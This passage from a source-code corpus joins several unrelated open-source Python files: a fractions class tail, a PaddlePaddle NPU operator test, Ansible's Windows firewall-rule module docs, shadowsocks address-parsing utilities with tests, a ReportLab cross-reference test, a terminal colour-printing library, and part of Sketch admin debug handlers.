either another Rational instance or a float `other`. If
`other` is not a Rational instance or a float, return
NotImplemented. `op` should be one of the six standard
comparison operators.
"""
# convert other to a Rational instance where reasonable.
if isinstance(other, Rational):
return op(self._numerator * other.denominator,
self._denominator * other.numerator)
# comparisons with complex should raise a TypeError, for consistency
# with int<->complex, float<->complex, and complex<->complex comparisons.
if isinstance(other, complex):
raise TypeError("no ordering relation is defined for complex numbers")
if isinstance(other, float):
if math.isnan(other) or math.isinf(other):
return op(0.0, other)
else:
return op(self, self.from_float(other))
else:
return NotImplemented
def __lt__(a, b):
"""a < b"""
return a._richcmp(b, operator.lt)
def __gt__(a, b):
"""a > b"""
return a._richcmp(b, operator.gt)
def __le__(a, b):
"""a <= b"""
return a._richcmp(b, operator.le)
def __ge__(a, b):
"""a >= b"""
return a._richcmp(b, operator.ge)
def __nonzero__(a):
"""a != 0"""
return a._numerator != 0
# support for pickling, copy, and deepcopy
def __reduce__(self):
return (self.__class__, (str(self),))
def __copy__(self):
if type(self) == Fraction:
return self # I'm immutable; therefore I am my own clone
return self.__class__(self._numerator, self._denominator)
def __deepcopy__(self, memo):
if type(self) == Fraction:
return self # My components are also immutable
return self.__class__(self._numerator, self._denominator)
|
mit
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/test_elementwise_max_op_npu.py
|
2
|
5125
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import unittest
import sys
sys.path.append("..")
from op_test import OpTest
import paddle
import paddle.fluid as fluid
paddle.enable_static()
SEED = 2021
@unittest.skipIf(not paddle.is_compiled_with_npu(),
"core is not compiled with NPU")
class TestElementwiseMax(OpTest):
def setUp(self):
self.set_npu()
self.op_type = "elementwise_max"
self.place = paddle.NPUPlace(0)
self.init_dtype()
np.random.seed(SEED)
x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
y = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
out = np.maximum(x, y)
self.inputs = {
'X': OpTest.np_dtype_to_fluid_dtype(x),
'Y': OpTest.np_dtype_to_fluid_dtype(y)
}
self.attrs = {}
self.outputs = {'Out': out}
def set_npu(self):
self.__class__.use_npu = True
def init_dtype(self):
self.dtype = np.float32
def test_check_output(self):
self.check_output_with_place(self.place, check_dygraph=False)
# TODO(ascendrc): Max grad test
# def test_check_grad(self):
# if self.dtype == np.float16:
# return
# self.check_grad(['X'], 'Out')
#
@unittest.skipIf(not paddle.is_compiled_with_npu(),
"core is not compiled with NPU")
class TestElementwiseMaxFp16(OpTest):
def setUp(self):
self.set_npu()
self.op_type = "elementwise_max"
self.place = paddle.NPUPlace(0)
self.init_dtype()
np.random.seed(SEED)
x = np.random.uniform(1, 2, [3, 4]).astype(self.dtype)
y = np.random.uniform(1, 2, [3, 4]).astype(self.dtype)
out = np.maximum(x, y)
self.inputs = {
'X': OpTest.np_dtype_to_fluid_dtype(x),
'Y': OpTest.np_dtype_to_fluid_dtype(y)
}
self.attrs = {}
self.outputs = {'Out': out}
def set_npu(self):
self.__class__.use_npu = True
self.__class__.no_need_check_grad = True
def init_dtype(self):
self.dtype = np.float16
def test_check_output(self):
self.check_output_with_place(self.place, check_dygraph=False, atol=1e-5)
@unittest.skipIf(not paddle.is_compiled_with_npu(),
"core is not compiled with NPU")
class TestElementwiseMaxNet(unittest.TestCase):
def _test(self, run_npu=True):
main_prog = paddle.static.Program()
startup_prog = paddle.static.Program()
main_prog.random_seed = SEED
startup_prog.random_seed = SEED
np.random.seed(SEED)
a_np = np.random.random(size=(32, 32)).astype('float32')
b_np = np.random.random(size=(32, 32)).astype('float32')
label_np = np.random.randint(2, size=(32, 1)).astype('int64')
with paddle.static.program_guard(main_prog, startup_prog):
a = paddle.static.data(name="a", shape=[32, 32], dtype='float32')
b = paddle.static.data(name="b", shape=[32, 32], dtype='float32')
label = paddle.static.data(
name="label", shape=[32, 1], dtype='int64')
c = paddle.maximum(a, b)
fc_1 = fluid.layers.fc(input=c, size=128)
prediction = fluid.layers.fc(input=fc_1, size=2, act='softmax')
cost = fluid.layers.cross_entropy(input=prediction, label=label)
loss = fluid.layers.reduce_mean(cost)
sgd = fluid.optimizer.SGD(learning_rate=0.01)
sgd.minimize(loss)
if run_npu:
place = paddle.NPUPlace(0)
else:
place = paddle.CPUPlace()
exe = paddle.static.Executor(place)
exe.run(startup_prog)
print("Start run on {}".format(place))
for epoch in range(100):
pred_res, loss_res = exe.run(
main_prog,
feed={"a": a_np,
"b": b_np,
"label": label_np},
fetch_list=[prediction, loss])
if epoch % 10 == 0:
print("Epoch {} | Prediction[0]: {}, Loss: {}".format(
epoch, pred_res[0], loss_res))
return pred_res, loss_res
def test_npu(self):
cpu_pred, cpu_loss = self._test(False)
npu_pred, npu_loss = self._test(True)
self.assertTrue(np.allclose(npu_pred, cpu_pred))
self.assertTrue(np.allclose(npu_loss, cpu_loss))
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
defionscode/ansible-modules-extras
|
windows/win_firewall_rule.py
|
22
|
3333
|
#!/usr/bin/env python
# (c) 2014, Timothy Vandenbrande <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: win_firewall_rule
version_added: "2.0"
author: Timothy Vandenbrande
short_description: Windows firewall automation
description:
- allows you to create/remove/update firewall rules
options:
enable:
description:
- is this firewall rule enabled or disabled
default: null
required: false
choices: ['yes', 'no']
state:
description:
            - create/remove/update the firewall rule
default: "present"
required: true
choices: ['present', 'absent']
name:
description:
            - the rule's name
default: null
required: true
direction:
description:
            - is this rule for inbound or outbound traffic
default: null
required: true
choices: [ 'In', 'Out' ]
action:
description:
- what to do with the items this rule is for
default: null
required: true
choices: [ 'allow', 'block' ]
description:
description:
- description for the firewall rule
default: null
required: false
localip:
description:
- the local ip address this rule applies to
default: null
required: false
remoteip:
description:
- the remote ip address/range this rule applies to
default: null
required: false
localport:
description:
- the local port this rule applies to
default: null
required: false
remoteport:
description:
- the remote port this rule applies to
default: null
required: false
program:
description:
- the program this rule applies to
default: null
required: false
service:
description:
- the service this rule applies to
default: null
required: false
protocol:
description:
- the protocol this rule applies to
default: null
required: false
profile:
description:
- the profile this rule applies to
default: null
required: false
force:
description:
- Enforces the change if a rule with different values exists
default: false
required: false
'''
EXAMPLES = '''
- name: Firewall rule to allow smtp on TCP port 25
action: win_firewall_rule
args:
name: smtp
      enable: yes
state: present
localport: 25
action: allow
protocol: TCP
'''
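# Additional illustrative task (added as a comment, not part of the module's
# EXAMPLES; the values are hypothetical): a blocking rule would combine
# direction: In, action: block, localport: 3389 and state: present, using the
# same argument names documented above.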
|
gpl-3.0
|
LazyClutch/shadowsocks
|
shadowsocks/common.py
|
945
|
8921
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import socket
import struct
import logging
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
def inet_ntop(family, ipstr):
if family == socket.AF_INET:
return to_bytes(socket.inet_ntoa(ipstr))
elif family == socket.AF_INET6:
import re
v6addr = ':'.join(('%02X%02X' % (ord(i), ord(j))).lstrip('0')
for i, j in zip(ipstr[::2], ipstr[1::2]))
v6addr = re.sub('::+', '::', v6addr, count=1)
return to_bytes(v6addr)
def inet_pton(family, addr):
addr = to_str(addr)
if family == socket.AF_INET:
return socket.inet_aton(addr)
elif family == socket.AF_INET6:
if '.' in addr: # a v4 addr
v4addr = addr[addr.rindex(':') + 1:]
v4addr = socket.inet_aton(v4addr)
v4addr = map(lambda x: ('%02X' % ord(x)), v4addr)
v4addr.insert(2, ':')
newaddr = addr[:addr.rindex(':') + 1] + ''.join(v4addr)
return inet_pton(family, newaddr)
dbyts = [0] * 8 # 8 groups
grps = addr.split(':')
for i, v in enumerate(grps):
if v:
dbyts[i] = int(v, 16)
else:
for j, w in enumerate(grps[::-1]):
if w:
dbyts[7 - j] = int(w, 16)
else:
break
break
return b''.join((chr(i // 256) + chr(i % 256)) for i in dbyts)
else:
raise RuntimeError("What family?")
def is_ip(address):
for family in (socket.AF_INET, socket.AF_INET6):
try:
if type(address) != str:
address = address.decode('utf8')
inet_pton(family, address)
return family
except (TypeError, ValueError, OSError, IOError):
pass
return False
def patch_socket():
if not hasattr(socket, 'inet_pton'):
socket.inet_pton = inet_pton
if not hasattr(socket, 'inet_ntop'):
socket.inet_ntop = inet_ntop
patch_socket()
ADDRTYPE_IPV4 = 1
ADDRTYPE_IPV6 = 4
ADDRTYPE_HOST = 3
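# Wire format handled by pack_addr()/parse_header() below (illustrative
# summary, added as a comment): one addrtype byte, then the address (4 bytes
# for IPv4, 16 bytes for IPv6, or a length-prefixed hostname for
# ADDRTYPE_HOST), then a 2-byte big-endian port.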
def pack_addr(address):
address_str = to_str(address)
for family in (socket.AF_INET, socket.AF_INET6):
try:
r = socket.inet_pton(family, address_str)
if family == socket.AF_INET6:
return b'\x04' + r
else:
return b'\x01' + r
except (TypeError, ValueError, OSError, IOError):
pass
if len(address) > 255:
address = address[:255] # TODO
return b'\x03' + chr(len(address)) + address
def parse_header(data):
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 2 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
return addrtype, to_bytes(dest_addr), dest_port, header_length
class IPNetwork(object):
ADDRLENGTH = {socket.AF_INET: 32, socket.AF_INET6: 128, False: 0}
def __init__(self, addrs):
self._network_list_v4 = []
self._network_list_v6 = []
if type(addrs) == str:
addrs = addrs.split(',')
list(map(self.add_network, addrs))
def add_network(self, addr):
        if addr == "":
return
block = addr.split('/')
addr_family = is_ip(block[0])
addr_len = IPNetwork.ADDRLENGTH[addr_family]
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(block[0]))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, block[0]))
ip = (hi << 64) | lo
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
        if len(block) == 1:
            prefix_size = 0
            while (ip & 1) == 0 and ip != 0:
ip >>= 1
prefix_size += 1
logging.warn("You did't specify CIDR routing prefix size for %s, "
"implicit treated as %s/%d" % (addr, addr, addr_len))
elif block[1].isdigit() and int(block[1]) <= addr_len:
prefix_size = addr_len - int(block[1])
ip >>= prefix_size
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
if addr_family is socket.AF_INET:
self._network_list_v4.append((ip, prefix_size))
else:
self._network_list_v6.append((ip, prefix_size))
def __contains__(self, addr):
addr_family = is_ip(addr)
if addr_family is socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(addr))
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v4))
elif addr_family is socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, addr))
ip = (hi << 64) | lo
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v6))
else:
return False
def test_inet_conv():
ipv4 = b'8.8.4.4'
b = inet_pton(socket.AF_INET, ipv4)
assert inet_ntop(socket.AF_INET, b) == ipv4
ipv6 = b'2404:6800:4005:805::1011'
b = inet_pton(socket.AF_INET6, ipv6)
assert inet_ntop(socket.AF_INET6, b) == ipv6
def test_parse_header():
assert parse_header(b'\x03\x0ewww.google.com\x00\x50') == \
(3, b'www.google.com', 80, 18)
assert parse_header(b'\x01\x08\x08\x08\x08\x00\x35') == \
(1, b'8.8.8.8', 53, 7)
assert parse_header((b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00'
b'\x00\x10\x11\x00\x50')) == \
(4, b'2404:6800:4005:805::1011', 80, 19)
def test_pack_header():
assert pack_addr(b'8.8.8.8') == b'\x01\x08\x08\x08\x08'
assert pack_addr(b'2404:6800:4005:805::1011') == \
b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00\x00\x10\x11'
assert pack_addr(b'www.google.com') == b'\x03\x0ewww.google.com'
def test_ip_network():
ip_network = IPNetwork('127.0.0.0/24,::ff:1/112,::1,192.168.1.1,192.0.2.0')
assert '127.0.0.1' in ip_network
assert '127.0.1.1' not in ip_network
    assert '::ff:ffff' in ip_network
assert '::ffff:1' not in ip_network
assert '::1' in ip_network
assert '::2' not in ip_network
assert '192.168.1.1' in ip_network
assert '192.168.1.2' not in ip_network
assert '192.0.2.1' in ip_network
assert '192.0.3.1' in ip_network # 192.0.2.0 is treated as 192.0.2.0/23
assert 'www.google.com' not in ip_network
if __name__ == '__main__':
test_inet_conv()
test_parse_header()
test_pack_header()
test_ip_network()
|
apache-2.0
|
makinacorpus/reportlab-ecomobile
|
tests/test_platypus_xref.py
|
1
|
5178
|
#Copyright ReportLab Europe Ltd. 2000-2008
#see license.txt for license details
"""Test long documents with indexes, tables and cross-references
"""
__version__='''$Id$'''
from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, outputfile, printLocation
setOutDir(__name__)
import sys, os, time
from string import split, strip, join, whitespace, find
from operator import truth
from types import StringType, ListType
import unittest
from reportlab.lib import colors
from reportlab.lib.units import cm
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.platypus import Paragraph, Flowable, Frame, PageTemplate, BaseDocTemplate
from reportlab.platypus.frames import Frame
from reportlab.lib.randomtext import randomText, PYTHON
from reportlab.platypus.tableofcontents import TableOfContents, SimpleIndex
def myMainPageFrame(canvas, doc):
"The page frame used for all PDF documents."
canvas.saveState()
canvas.setFont('Times-Roman', 12)
pageNumber = canvas.getPageNumber()
canvas.drawString(10*cm, cm, str(pageNumber))
canvas.restoreState()
class MyDocTemplate(BaseDocTemplate):
_invalidInitArgs = ('pageTemplates',)
def __init__(self, filename, **kw):
frame1 = Frame(2.5*cm, 2.5*cm, 16*cm, 25*cm, id='Frame1')
self.allowSplitting = 0
self.showBoundary = 1
apply(BaseDocTemplate.__init__, (self, filename), kw)
template = PageTemplate('normal', [frame1], myMainPageFrame)
self.addPageTemplates(template)
def afterFlowable(self, flowable):
"Registers TOC and Index entries and makes outline entries."
if flowable.__class__.__name__ == 'Paragraph':
styleName = flowable.style.name
if styleName == 'Heading1':
level = 0
text = flowable.getPlainText()
pageNum = self.page
self.notify('TOCEntry', (level, text, pageNum))
# Add PDF outline entries (not really needed/tested here).
key = str(hash(flowable))
c = self.canv
c.bookmarkPage(key)
c.addOutlineEntry(text, key, level=level, closed=0)
# index a bunch of pythonic buzzwords. In real life this
# would be driven by markup.
try:
text = flowable.getPlainText()
except:
return
for phrase in ['uniform','depraved','finger', 'Fraudulin']:
if find(text, phrase) > -1:
self.notify('IndexEntry', (phrase, self.page))
#print 'IndexEntry:',phrase, self.page
def _test0(self):
"This makes one long multi-page paragraph."
from reportlab.platypus.flowables import DocAssign, DocExec, DocPara, DocIf, DocWhile
# Build story.
story = []
styleSheet = getSampleStyleSheet()
h1 = styleSheet['Heading1']
h1.pageBreakBefore = 1
h1.keepWithNext = 1
h1.outlineLevel = 0
h2 = styleSheet['Heading2']
h2.backColor = colors.cyan
h2.keepWithNext = 1
h2.outlineLevel = 1
bt = styleSheet['BodyText']
story.append(Paragraph("""Cross-Referencing Test""", styleSheet["Title"]))
story.append(Paragraph("""
Subsequent pages test cross-references: indexes, tables and individual
cross references. The number in brackets at the end of each paragraph
is its position in the story. (%d)""" % len(story), bt))
story.append(Paragraph("""Table of Contents:""", styleSheet["Title"]))
toc = TableOfContents()
story.append(toc)
chapterNum = 1
for i in range(10):
story.append(Paragraph('Chapter %d: Chapters always starts a new page' % chapterNum, h1))
chapterNum = chapterNum + 1
for j in range(3):
            story.append(Paragraph('Heading1 paragraphs should always '
                'have a page break before. Heading 2 on the other hand '
                'should always have a FRAME break before (%d)' % len(story), bt))
story.append(Paragraph('Heading 2 should always be kept with the next thing (%d)' % len(story), h2))
for j in range(3):
story.append(Paragraph(randomText(theme=PYTHON, sentences=2)+' (%d)' % len(story), bt))
story.append(Paragraph('I should never be at the bottom of a frame (%d)' % len(story), h2))
story.append(Paragraph(randomText(theme=PYTHON, sentences=1)+' (%d)' % len(story), bt))
story.append(Paragraph('The Index which goes at the back', h1))
story.append(SimpleIndex())
doc = MyDocTemplate(outputfile('test_platypus_xref.pdf'))
doc.multiBuild(story)
class BreakingTestCase(unittest.TestCase):
"Test multi-page splitting of paragraphs (eyeball-test)."
def test0(self):
_test0(self)
def makeSuite():
return makeSuiteForClasses(BreakingTestCase)
#noruntests
if __name__ == "__main__":
if 'debug' in sys.argv:
        _test0(None)
else:
unittest.TextTestRunner().run(makeSuite())
printLocation()
|
bsd-3-clause
|
yrsegal/OneCommandSublimeSyntax
|
OneCommand/wireutils.py
|
5
|
10449
|
"""
Wire Segal's utility library.
Do whatever with it, I seriously couldn't care less.
Runs on Python 2.6 and later.
"""
from __future__ import print_function
import os, json, time, sys, re, traceback, threading
def format(string, **kwargs):
"""
Format strings with **kwargs.
"""
for arg in kwargs:
regex = re.compile(r"\{" + arg + r"\}", re.IGNORECASE)
string = regex.sub(str(kwargs[arg]), string)
for color in ansi_colors.COLORS:
regex = re.compile(r"\{" + color + r"\}", re.IGNORECASE)
string = regex.sub(str(ansi_colors.COLORS[color]), string)
return string
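# Illustrative usage (added comment; relies on the ansi_colors class defined
# later in this module): format("{red}error:{endc} {msg}", msg="oops")
# substitutes {msg} from kwargs and {red}/{endc} from ansi_colors.COLORS.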
def format_traceback(e, text="Traceback (most recent call last):"):
"""
Format a traceback into a printable string.
"""
if not hasattr(e, "__traceback__"):
if str(e):
return str(type(e).__name__) + ": " + str(e)
return str(type(e).__name__)
trace = traceback.extract_tb(e.__traceback__) # Get the traceback object
error = format("{text}\n", text=text) # Start out with `text`
# Iterate through the traceback and add each iteration to the string
for filename,lineno,function,message in trace:
error += format(" File \"{name}\", line {num}, in {funcname}\n",
name=filename,
num=lineno,
funcname=function)
if message:
error += format(" {data}\n", data=message)
# Add the type and message of the error
error += str(type(e).__name__)
if str(e): error += format(": {description}", description=e)
return error
class Registry:
def __init__(self):
self.events = {}
def on(self, tag, *args):
if tag not in self.events:
self.events[tag] = {}
funcid = -1
for i in self.events[tag]:
funcid = max(funcid, i)
funcid += 1
self.events[tag][funcid] = args
return funcid
def deregister(self, tag, funcid):
if tag in self.events:
if funcid in self.events[tag]:
del self.events[tag][funcid]
return True
return False
def hash(self):
return hash(str(self.events))
def graft(self, reg):
for key in reg.events:
if key not in self.events:
self.events[key] = {}
for oldjob in reg.events[key]:
newjob = -1
for i in self.events[key]:
newjob = max(newjob, i)
newjob += 1
self.events[key][newjob] = reg.events[key][oldjob]
class Config:
"""
A JSON read-only loader that will update automatically from `path`.
"""
def __init__(self, path):
self.path = path
        self.lastmodtime = os.path.getctime(path) # record the ctime of the target file
self.data = json.load(open(path))
def reload(self):
        if os.path.getctime(self.path) > self.lastmodtime: # re-read only if the file's ctime has advanced
self.data = json.load(open(self.path))
self.lastmodtime = os.path.getctime(self.path)
# These are extensions of self.data's methods, except they run self.reload.
def __getitem__(self, y):
self.reload()
return self.data[y]
def __contains__(self, key):
self.reload()
return key in self.data
def get(self, k, d=None):
self.reload()
return self.data.get(k, d)
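# Illustrative usage (added comment; "settings.json" is a hypothetical path):
# cfg = Config("settings.json"); cfg["token"] transparently re-reads the file
# first whenever its ctime has advanced.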
def date_time_string(timestamp=None):
"""
Return the current date and time formatted for a message header.
"""
monthname = [None,
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
now = time.time()
year, month, day, hh, mm, ss, x, y, z = time.localtime(now)
# Add zeroes to keep the length of the timestamp constant
hh = format("0{hours}", hours=hh) if hh < 10 else str(hh)
mm = format("0{minutes}", minutes=mm) if mm < 10 else str(mm)
ss = format("0{seconds}", seconds=ss) if ss < 10 else str(ss)
day = format("0{day}", day=day) if day < 10 else str(day)
s = format("{magenta}[{dd}/{mon}/{yyyy} {hh}:{mm}:{ss}]{endc} ",
dd = day,
mon = monthname[month],
yyyy = year,
hh = hh,
mm = mm,
ss = ss)
return s
def supports_color():
"""
Returns True if the running system's terminal supports color, and False
otherwise.
"""
plat = sys.platform
supported_platform = plat != 'Pocket PC' and (plat != 'win32' or
'ANSICON' in os.environ)
# isatty is not always implemented, #6223.
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if not supported_platform or not is_a_tty:
return False
return True
color_supported = supports_color()
if color_supported:
class ansi_colors: # All color codes
"""
A helper class containing colors (for pretty printing.)
"""
BLACK = '\033[30m'
DARKRED = '\033[31m'
DARKGREEN = '\033[32m'
DARKYELLOW = '\033[33m'
DARKBLUE = '\033[34m'
PURPLE = '\033[35m'
DARKCYAN = '\033[36m'
GRAY = '\033[37m'
DARKGRAY = '\033[90m'
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
MAGENTA = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
ORANGE = '\033[38;5;202m'
DARKPURPLE = '\033[38;5;53m'
BROWN = '\033[38;5;94m'
PEACH = '\033[38;5;208m'
GOLDEN = '\033[38;5;166m'
BOLD = '\033[1m'
LINE = '\033[4m'
REMAKELINE = '\033[F\033[K'
ENDC = '\033[0m'
COLORS = {
"black": BLACK,
"darkred": DARKRED,
"darkgreen": DARKGREEN,
"darkyellow": DARKYELLOW,
"darkblue": DARKBLUE,
"purple": PURPLE,
"darkcyan": DARKCYAN,
"gray": GRAY,
"darkgray": DARKGRAY,
"red": RED,
"green": GREEN,
"yellow": YELLOW,
"blue": BLUE,
"magenta": MAGENTA,
"cyan": CYAN,
"white": WHITE,
"orange": ORANGE,
"darkpurple": DARKPURPLE,
"brown": BROWN,
"peach": PEACH,
"golden": GOLDEN,
"bold": BOLD,
"line": LINE,
"remakeline": REMAKELINE,
"endc": ENDC
}
else:
class ansi_colors: # No color codes
"""
A helper class containing no colors, allowing systems that don't support ANSI to continue running without strange logs.
"""
BLACK = ''
DARKRED = ''
DARKGREEN = ''
DARKYELLOW = ''
DARKBLUE = ''
PURPLE = ''
DARKCYAN = ''
GRAY = ''
DARKGRAY = ''
RED = ''
GREEN = ''
YELLOW = ''
BLUE = ''
MAGENTA = ''
CYAN = ''
WHITE = ''
ORANGE = ''
DARKPURPLE = ''
BROWN = ''
PEACH = ''
GOLDEN = ''
BOLD = ''
LINE = ''
REMAKELINE = ''
ENDC = ''
COLORS = {
"black": BLACK,
"darkred": DARKRED,
"darkgreen": DARKGREEN,
"darkyellow": DARKYELLOW,
"darkblue": DARKBLUE,
"purple": PURPLE,
"darkcyan": DARKCYAN,
"gray": GRAY,
"darkgray": DARKGRAY,
"red": RED,
"green": GREEN,
"yellow": YELLOW,
"blue": BLUE,
"magenta": MAGENTA,
"cyan": CYAN,
"white": WHITE,
"orange": ORANGE,
"darkpurple": DARKPURPLE,
"brown": BROWN,
"peach": PEACH,
"golden": GOLDEN,
"bold": BOLD,
"line": LINE,
"remakeline": REMAKELINE,
"endc": ENDC
}
def rainbonify(string):
if not color_supported: return string
else:
colors = [ansi_colors.RED, ansi_colors.ORANGE, ansi_colors.YELLOW, ansi_colors.GREEN,
ansi_colors.BLUE, ansi_colors.PURPLE, ansi_colors.DARKPURPLE]
nstring = ""
cind = 0
for i in string:
nstring += colors[cind] + i
cind += 1
cind %= len(colors)
return nstring + ansi_colors.ENDC
class color_config:
"""
An object used to configure color_print and color_input.
"""
def __init__(self):
self.color = ansi_colors.WHITE
self.name = "Generic"
def tag(self):
"""
Return the tag for pretty printing from the config.
"""
return format("{color}[{name}] {endc}",
color=self.color,
name=self.name)
def whitespace(self):
"""
Return the whitespace for non-printed lines.
"""
return " "*(26+len(self.name))
color_printing_config = color_config() # create the instance of color_config used to configure color_print and color_input
lastprinted = None
print_lock = threading.Lock()
def color_print(text, color="", strip=False, func=print, add_newline=False, colorconfig = None, **kwargs):
"""
Pretty print `text`, with `color` as its color, using `func`.
If `strip`, then remove whitespace from both sides of each line.
"""
global lastprinted, print_lock
timestamp = date_time_string()
print_lock.acquire()
if not colorconfig:
colorconfig = color_printing_config
if "whitespace" not in kwargs:
kwargs["whitespace"] = colorconfig.whitespace()
kwargs["color"] = color
text = format(str(text), **kwargs)
# Make sure not to print the same thing twice
if text == lastprinted:
if not color_supported:
print_lock.release()
return
print(ansi_colors.REMAKELINE, end="")
lastprinted = text
# Split the text by lines
if strip:
prints = [i.strip() for i in text.split("\n")]
else:
prints = text.split("\n")
originstr = colorconfig.tag()
func(format("{timestamp}{processtag}{color}{text}{endc}",
timestamp = timestamp,
processtag = originstr,
color = color,
text = prints[0])) # Print the first line with a timestamp
if add_newline: func("\n")
for i in prints[1:]:
func(format("{whitespace}{color}{text}{endc}",
whitespace = colorconfig.whitespace(),
color = color,
text = i)) # Print all consecutive lines
if add_newline: func("\n")
print_lock.release()
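# Illustrative usage (added comment):
# color_print("loaded {n} items", color=ansi_colors.GREEN, n=42) prints one
# timestamped, tagged green line, serialised through the module print lock.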
try:
agnostic_input = raw_input
except:
agnostic_input = input
def color_input(text, color="", strip=False, func=agnostic_input, colorconfig = None, **kwargs):
"""
Pretty print `text`, with `color` as its color. Take input using `func` on the last line.
If `strip`, then remove whitespace from both sides of each line.
"""
global print_lock
timestamp = date_time_string()
print_lock.acquire()
if not colorconfig:
colorconfig = color_printing_config
if "whitespace" not in kwargs:
kwargs["whitespace"] = colorconfig.whitespace()
kwargs["color"] = color
text = format(str(text), **kwargs)
# Split the text by lines
if strip:
prints = [i.strip() for i in text.split("\n")]
prints[-1] += " " # Add a spacing to the last line
else:
prints = text.split("\n")
originstr = colorconfig.tag()
# Print in order if there's more than one line
if len(prints) > 1:
print(format("{timestamp}{processtag}{color}{text}",
timestamp = timestamp,
processtag = originstr,
color = color,
text = prints[0]))
for i in prints[1:-1]:
print(format("{whitespace}{color}{text}",
whitespace = colorconfig.whitespace(),
color = color,
text = i))
inp = func(format("{whitespace}{color}{text}{endc}",
whitespace = colorconfig.whitespace(),
color = color,
text = prints[-1]))
print_lock.release()
return inp
else:
inp = func(format("{timestamp}{processtag}{color}{text}{endc}",
timestamp = timestamp,
processtag = originstr,
color = color,
text = prints[0]))
print_lock.release()
return inp
|
mit
|
nikcub/Sketch
|
sketch/debug.py
|
1
|
3142
|
import os
import sketch
class CookieTest(sketch.AdminController):
def get(self, arg):
if arg == "/set":
self.redirect('/cookie?set')
if arg == "/clear":
            self.session.invalidate()
self.redirect('/cookie')
else:
if self.session.is_new():
self.session["test"] = 1
else:
self.session["test"] += 1
self.render('cookie', {
'cookie': self.request.str_cookies,
'session': self.session,
'test': self.session["test"],
'sid': self.session.get_sid(),
})
class SketchSession(sketch.AdminController):
def get(self, action):
if action == "template":
return self.render('template', {})
if action == "sessionDestroy":
self.session.invalidate()
return self.redirect('/_session')
if action == "sessionCreate":
self.session['test'] = "test"
self.session.save()
return self.redirect('/_session')
if action == "sessionAddTest":
self.session['var1'] = "this is var one"
self.session['var2'] = {"this": "var two"}
self.session['var3'] = ['this', 'is', 'var3']
self.session['auth'] = True
self.session.save()
return self.redirect('/_session')
if action == "session":
pass
class Handler(sketch.AdminController):
template_folder = 'sketch.admin'
def get(self, action):
if action == "stash":
# from vendor import stash
pass
if action == "session":
action = self.request.get('action')
if action == "create":
self.session['init'] = "initialized"
return self.redirect_back()
if action == "destroy":
